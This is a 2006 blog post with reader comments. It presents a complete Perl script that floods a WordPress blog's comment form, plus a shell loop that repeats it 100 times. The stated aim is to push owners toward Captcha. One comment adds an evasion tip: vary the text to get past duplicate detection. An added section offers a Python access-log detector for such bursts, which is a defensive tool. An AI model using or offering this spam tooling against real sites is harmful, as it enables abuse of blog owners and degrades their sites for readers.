Spamming Blogs — Howto
Disclaimer:
- A renunciation of any claim to or connection with
- Disavowal
- A statement made to save one’s ass
That’s not my definition, I found it in the movie “Dogma”.
Anyway, this post doesn’t aim to encourage you to spam someone else’s blog; it is a message to those who underestimate the spam effect, showing how easy and simple it is to do with a plain Perl interpreter that requires no extra packages, plus an Internet connection, more or less fast.
This post also aims to persuade you to install a Captcha module, which makes spamming more difficult.
Thinking “Let them spam and I will manually delete bad comments” is a very bad idea: I have been experiencing more than 100 spam comments per day on my blog; and setting keywords that move a spam comment to the moderation queue is not safe either: the filter is not intelligent, sometimes it can’t detect spam or, worse, it deletes a “good” comment.
Solution? Install Captcha (I say it again).
To those who claim that this kind of sensitive information should not be posted in public, I would say: “I am against hiding any kind of information: I publish the attack method so that users know how to defend themselves. Spammers don’t need my post to learn how to spam: they work in big companies and they are paid to spam”.
Well, let’s start. Here’s a Perl script that spams a WordPress blog:
#!/usr/bin/perl -w
use strict;
use warnings;
use POSIX;
use HTTP::Request::Common;
use LWP;
use LWP::UserAgent;

die "Usage:\n$0 \"Target url\" \"Your name\" \"Your mail\" \"Your homepage\" \"File containing comments\" \"Article ID\"\n"
    unless $#ARGV == 5;

my $target = $ARGV[0];    # First argument: URL of the WordPress blog
if ( $target !~ /^http:\/\/.*\..*$/ ) {
    die "First argument must be a URL!\n";
}

my $author = $ARGV[1];    # Second argument: commenter name
my $email  = $ARGV[2];    # Third argument: commenter e-mail
if ( $email !~ /^.*\@.*\..*$/ ) {
    die "Third argument must be a valid mail address!\n";
}

my $homepage = $ARGV[3];  # Fourth argument: commenter home page
if ( $homepage !~ /^http:\/\/.*\..*$/ ) {
    die "You should have a valid home page\n";
}

my $comment = $ARGV[4];   # Fifth argument: file holding the comment text
if ( !-f $comment ) {
    die "5th argument must be a valid file from which the comment will be extracted!\n";
}

my $id = $ARGV[5];        # Sixth argument: post ID
if ( $id !~ /\d+/ ) {
    die "Please enter target ID\n";
}

# Read the whole comment file into $content
my $content = "";
open CONTENT, $comment or die "Cannot open $comment: $!\n";
while (<CONTENT>) {
    $content .= $_;
}
close CONTENT;

# WordPress comment handler; the form fields below are the ones it expects
my $comment_target = "/wp-comments-post.php";
my $full_url       = $target . $comment_target;

my $ua  = LWP::UserAgent->new();
my $req = POST $full_url,
    [
        author          => $author,
        email           => $email,
        url             => $homepage,
        comment         => $content,
        comment_post_ID => $id,
        submit          => 1
    ];

my $result = $ua->request($req)->as_string;    # The devil's action
print $result;
print $#ARGV;    # debug: index of the last argument
Very simple. This is useful to spam one post, but what about
for i in $(seq 1 100); do
    perl spam.pl "Target url" "Your name" "Your mail" "Your homepage" "source$i.txt" "Article ID"
done
? Without Captcha, it works!
In the same way, you may spam any blog platform: dot-clear, blogger, … or even sky blog, blog spirit or whatever. It’s possible as long as comments are open to anyone and no Captcha has to be typed.
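Added example, not part of the original post: the script above POSTs straight to /wp-comments-post.php without ever fetching the article, and the shell loop repeats it many times a minute. Both traits are visible in the web server access log, so a blog owner can spot such a run (and feed the offending address to a block list or the moderation queue) even before a Captcha is installed. The log lines and IP addresses below are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return the fields we need from one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"]}

def find_comment_spammers(lines, window=timedelta(seconds=60), max_posts=5):
    """Return {ip: reason} for clients that behave like the loop above:
    more than max_posts comment POSTs inside any window, or a comment
    POST from a client that never fetched a page first (no GET at all)."""
    posts = defaultdict(list)   # ip -> timestamps of recent comment POSTs
    seen_get = set()            # ips that loaded some page before posting
    flagged = {}
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "GET":
            seen_get.add(rec["ip"])
        elif rec["method"] == "POST" and rec["path"].endswith("/wp-comments-post.php"):
            if rec["ip"] not in seen_get:
                flagged.setdefault(rec["ip"], "comment POST without any prior GET")
            times = posts[rec["ip"]]
            times.append(rec["ts"])
            while rec["ts"] - times[0] > window:   # slide the window forward
                times.pop(0)
            if len(times) > max_posts:
                flagged[rec["ip"]] = f"{len(times)} comment POSTs within {window.seconds}s"
    return flagged

# Constructed sample (documentation IPs): one human commenter, one scripted burst.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2006:15:50:01 +0200] "GET /?p=42 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2006:15:52:30 +0200] "POST /wp-comments-post.php HTTP/1.1" 302 0',
] + [
    f'198.51.100.9 - - [10/May/2006:15:53:{i:02d} +0200] "POST /wp-comments-post.php HTTP/1.1" 302 0'
    for i in range(7)
]
```

Run find_comment_spammers over your own access log lines; the human commenter above (one GET, then one POST) is not flagged, while the burst is.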

May 10th, 2006 at 3:50 pm
Really interesting... I agree, the better we know our weaknesses, the better we can protect ourselves.

I’ll come back to take a look at the code.
See u
PS: this is the 4th time I’ve tried to post this comment... which shows that too much security kills the very purpose of the blog.
May 10th, 2006 at 3:55 pm
Freedom or Security, one has to choose…
What was the problem regarding posting the comment?
May 15th, 2006 at 11:36 am
Well, actually, about the comment: if you click on newID when you have already written your message, you lose your message. Same when you refresh the page, or when you make a mistake entering the ID: you also lose the message you wrote and have to enter it all again... that’s not the case on Blogger, for example.
May 15th, 2006 at 12:58 pm
When you refresh the comment, WordPress automatically detects an identical message and prevents you from posting it again. That’s the reason for using different texts while spamming.